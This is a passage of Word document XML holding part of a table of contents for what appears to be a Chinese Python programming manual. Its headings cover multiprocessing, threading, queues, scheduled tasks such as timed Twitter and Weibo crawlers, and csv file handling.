              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>519</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E376E67" w14:textId="69D25713" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779978" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>map:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>多参数任务</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779978 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>522</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F936ADE" w14:textId="48020DE7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779979" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>apply_async()</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>输出多个迭代结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779979 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>522</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45778D75" w14:textId="75451E5B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779980" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>process</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建多进程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779980 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>524</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="167A8DEF" w14:textId="192B683E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779981" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>多线程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779981 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>525</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76A3C7C9" w14:textId="7D0F57BE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779982" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>线程锁</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779982 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>526</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0434728B" w14:textId="2E095387" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779983" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>信号量</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779983 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>526</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B1AF02C" w14:textId="37B61E89" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779984" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>线程通信</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779984 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>528</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="037CB23D" w14:textId="60EA1D68" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779985" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>threading</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779985 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>529</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61CE7126" w14:textId="14EBDEE7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779986" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>multiprocessing.dummy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779986 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>529</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47D7B857" w14:textId="2D29AA14" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779987" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>消息同步</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779987 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>530</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39C7ACE9" w14:textId="73A85476" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779988" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>普通</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>FIFO</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>队列</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779988 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>530</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C412F2D" w14:textId="3CDB04BA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779989" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>多进程的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>FIFO</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>队列</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779989 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>533</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BBBA498" w14:textId="13C9553A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779990" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>定时执行任务</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779990 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>535</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58A62D7D" w14:textId="6D0FDC2D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779991" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>实际案例：每两个小时定时运行推特爬虫</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779991 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>536</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A2BFF2E" w14:textId="4C2A9B68" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779992" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>实际案例：每天定点运行微博爬虫</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779992 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>537</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04E981B3" w14:textId="152985CE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779993" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>csv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779993 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>537</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D21586B" w14:textId="23B32131" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779994" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>读取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779994 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>538</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5349B0AD" w14:textId="3DB6A86A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779995" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>写入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
